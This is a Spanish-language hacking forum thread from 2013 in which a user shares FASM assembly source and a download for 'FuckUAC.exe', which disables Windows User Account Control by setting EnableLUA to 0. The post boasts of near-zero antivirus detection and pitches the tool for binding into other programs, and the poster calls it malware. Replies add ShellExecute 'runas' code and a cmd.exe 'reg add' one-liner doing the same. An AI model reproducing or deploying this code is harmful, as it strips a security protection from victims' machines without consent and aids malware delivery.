Página 1 de 2
[ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 19:53
por Scorpio
Después de dos días estudiando ASM, pude hacer esto, 4 Bitch horas programando, por que no conseguía hacer funcionar ''ShellExecute'', y vi estas API's en el Modulo Fuck UAC que publiqué hace tiempo.
Pesa solo 2kb, mayormente es para Bindearlo o añadirlo de Resource a sus proyectos.
Scan:
Mostrar/Ocultar
RESULTS: 1/35
AVG Free -
ArcaVir -
Avast 5 -
AntiVir (Avira) - TR/Crypt.XPACK.Gen
BitDefender -
VirusBuster -
Clam -
COMODO -
Dr.Web -
eTrust-Vet -
F-PROT -
F-Secure -
G Data -
IKARUS -
Kaspersky -
McAfee -
MS Essentials -
ESET NOD32 -
Norman -
Norton -
Panda -
A-Squared -
Quick Heal -
Solo -
Sophos -
Trend Micro -
VBA32 -
Vexira -
Zoner AntiVirus -
Ad-Aware -
BullGuard -
Immunet -
K7 Ultimate -
NANO -
VIPRE -
File Name FuckUAC.exe
File Size: 2048
File MD5: c2bdd5357335b33792aa015a2f79e70b
File SHA1: b6d5e01903db680b051a009a726a0982e8f4ccb1
Check Time: 2013-04-23 20:45:53
Scan report generated by
[Enlace externo eliminado para invitados]
Source:
Mostrar/Ocultar
Código: Seleccionar todo
include 'WIN32AX.INC'
.data
UACRuta db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System', 0
UACClave db 'EnableLUA', 0
UACFuck dd ?
.code
start:
invoke RegOpenKeyExA, HKEY_LOCAL_MACHINE, UACRuta, 0, KEY_WRITE, UACFuck
invoke RegSetValueExA, [UACFuck], UACClave, 0, REG_DWORD, 0, 0
invoke RegCloseKey, [UACFuck]
invoke ExitProcess, 0
.end start
Descarga:
[Enlace externo eliminado para invitados]
Password: Hackerize > Reverse > RC4(Scorpio) > DES(Xor(Scorpio)) > BASE64 > TIGO > FAERON74 > ESAB46 > ZONG22 > ZARA128 > TRAN15 > LEPAD18 > JAPOO C2
Saludos.
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 19:56
por $DoC
La puta madre, ya te iba a preguntar cuanto tardaste en cifrar la pass JAJAJAJ.
Buen trabajo, dale duro a ASM!
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 19:57
por sanko
Dale muy bueno cerda , sigue dandole al bajo nivel
PD: que te muevan el post a su sección :p
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 19:58
por Scorpio
$DoC escribió:La puta madre, ya te iba a preguntar cuanto tardaste en cifrar la pass JAJAJAJ.
Buen trabajo, dale duro a ASM!
Jajaja
Aprendo ASM solo por aburrimiento, así entiendo mas de API's y me valdrá para ASM Inline ahora en C++.
Saludos.
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 20:00
por Scorpio
sanko escribió:Dale muy bueno cerda , sigue dandole al bajo nivel
PD: que te muevan el post a su sección :p
Bueno tú con Python, no te resbales por las escaleras nunca.
PD:Fuck UAC = Malware
Saludos.
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 20:35
por Janpr99
Muchas gracias tio! Eres el rey de la UAC
Felicidades i gracias por compartirlo
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 21:57
por orlando9427
Muy buen código, ¿que ASM usas?
No te limites solo a el modo usuario hay un mundo de posibilidades en el kernel ;)
Saludos!
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 22:02
por adwind
Bueno el code aunque, mejor que el exe ejecute un *.reg y no lleva firma XD
Métete al modo KERNEL Con orlando :3
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 22:09
por Scorpio
orlando9427 escribió:Muy buen código, ¿que ASM usas?
No te limites solo a el modo usuario hay un mundo de posibilidades en el kernel ;)
Saludos!
Jaja, yo no podría con eso, aquí el maestro eres tú.
Uso FASM, fue el que mas me gusto, hace tiempo tenia MASM pero no me termino de convencer.
adwind escribió:Bueno el code aunque, mejor que el exe ejecute un *.reg y no lleva firma XD
Métete al modo KERNEL Con orlando :3
Ya ví lo de los .reg en tus Applet Java, aunque yo prefiero hacerlo desde Shell como ya dije, que es todo código y se puede ofuscar fácilmente, solo que me he peleado con ''ShellExecute''.
Saludos.
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 22:10
por SuC
Dale duro ahí
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 22:12
por eDuArDo__xD
Exelente xXSCORPIOXx justo buscaba algo asi
Saludos.
Re: [ASM]Fuck UAC y Source
Publicado: 23 Abr 2013, 23:39
por Pink
muy bueno xXSCORPIOXx.
Recuerda siempre depurar errores.
saludos
Re: [ASM]Fuck UAC y Source
Publicado: 24 Abr 2013, 00:03
por Pink
Por si quieres con la ShellExcecute creo que quieres algo así.
include 'WIN32AX.INC'
.data
archivo db "C:\file.exe",0
runas db "runas",0
.code
start:
PUSH SW_SHOW
PUSH NULL
PUSH NULL
PUSH archivo
PUSH runas
PUSH NULL
CALL [ShellExecute]
PUSH 0
CALL [ExitProcess]
.end start
Saludos
PD: no lo probé porque no tengo el fasm a la mano. pero debería andar.
saludos
Re: [ASM]Fuck UAC y Source
Publicado: 24 Abr 2013, 00:14
por Scorpio
Pink escribió:Por si quieres con la ShellExcecute creo que quieres algo así.
include 'WIN32AX.INC'
.data
archivo db "C:\file.exe",0
runas db "runas",0
.code
start:
PUSH SW_SHOW
PUSH NULL
PUSH NULL
PUSH archivo
PUSH runas
PUSH NULL
CALL [ShellExecute]
PUSH 0
CALL [ExitProcess]
.end start
Saludos
PD: no lo probé porque no tengo el fasm a la mano. pero debería andar.
saludos
Ya lo intente asi, pero nada, no tira, quiero ejecutar esta línea.
Código: Seleccionar todo
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Al ponerlo en tu código tampoco funciona, y yo no veo que hago mal, aun no tengo el nivel.
Muchas Gracias
Saludos.
Re: [ASM]Fuck UAC y Source
Publicado: 24 Abr 2013, 00:45
por Pink
Proba así a ver. :P
include 'WIN32AX.INC'
.data
cmd db "cmd.exe",0
parametro db "/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
.code
start:
PUSH SW_SHOW
PUSH NULL
PUSH parametro
PUSH cmd
PUSH NULL
PUSH NULL
CALL [ShellExecute]
PUSH 0
CALL [ExitProcess]
.end start
Saludos